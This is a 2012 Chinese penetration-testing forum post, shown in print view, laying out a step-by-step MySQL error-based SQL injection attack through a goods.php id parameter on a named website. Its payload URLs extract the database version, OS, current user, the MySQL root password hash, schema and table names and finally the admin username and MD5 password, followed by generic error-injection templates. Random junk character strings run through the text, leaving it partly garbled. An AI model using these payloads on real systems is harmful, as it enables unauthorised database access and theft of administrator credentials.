中国网络渗透测试联盟

标题: 盲注详细内容 [打印本页]

作者: admin    时间: 2012-9-5 14:59
标题: 盲注详细内容
判断版本号
) x& @: `' q9 chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 L0 V8 R% C. `$ H2 z

3 u: \! y& S5 O( \; e判断系统  f  w1 h0 w  |

; D- ]# x3 G. m8 h) b' rhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
! I- |/ k0 M8 Y# O! i
& @/ g- [# U5 o$ ^$ j% ~
, J1 `: K4 g2 e7 k  i
: Q( N) b" l- y8 h- @* y3 G- p: y当前 user()
9 N: Q! h6 `& g% V$ S
9 N6 i6 d7 D) B6 qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 d  h- z9 m( q( E/ O  w, y3 L( ?4 O9 N( b
. O' m; b4 b+ t9 ~8 G8 z/ F
) o" g% @( s0 f6 @& E5 ?& U1 x
当前 database()' Q3 i/ Y# ?1 _% b+ I& L: R
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 X; {5 C( A+ f. k
! J! J/ T% q2 n$ a
# r& l$ o# C' A' r* B# E- t2 C% g) P# H
5 b& `1 {" q3 p% Q+ w& T
root hash
/ g- i! O4 U8 H4 Z, c5 n0 `3 X; J5 p! F! h0 i7 w0 F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23: f$ k# ^$ H0 R: d) t) K4 X

! {! E! s: M, z; I& f
% E7 I8 m; ?- ?! r/ c: h: X# J# }; H/ d. l4 S
当前 数据库表名
1 U& p" Z6 T' R* Z) W9 p6 Q' J: J: t, y6 ?; A8 g$ r" G
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  S4 T( _( e3 N" J# k
4 Q7 k, m9 p2 J5 c
' S' ]% S7 @1 P  p( Y# @% n
* a/ e( S# n: _# a4 j
当前 数据库 user_name 字段' w6 Y& H6 M0 @  S2 X: F
8 I# q4 y: q& v0 i6 ]& v
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, J2 B' N! k( B7 r" z
6 A* v- q7 v! Q
当前 数据库 字段 password4 `3 B7 ~+ ?+ `7 M  K! t4 a0 d. o
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" d" B& c" a- J' N' X
7 ^; t- `2 w( g  g% p

$ f; F- I$ V+ @4 [; }$ N" Q% g3 ]2 @+ Z) F9 Z9 M. W* {
获得 admin passwd(md5)
$ _1 X$ W% V- w. o" t  ~
8 T& f# @  R" ?- @# }8 T2 l4 O# e
9 [2 b& X& B( p  r% |6 G0 Fhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
6 b3 E, I! G# d4 Z" Y% Q% K. T$ p% Q
报错注射
3 _' Y8 I% W6 c" eSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)7 h2 L' n# U, e0 R

4 S2 Q3 z4 G3 s7 c; f+ w. e- rSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
7 `. \' p8 C; |0 l! o/ z; V
1 \& q5 x; I) I7 vand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2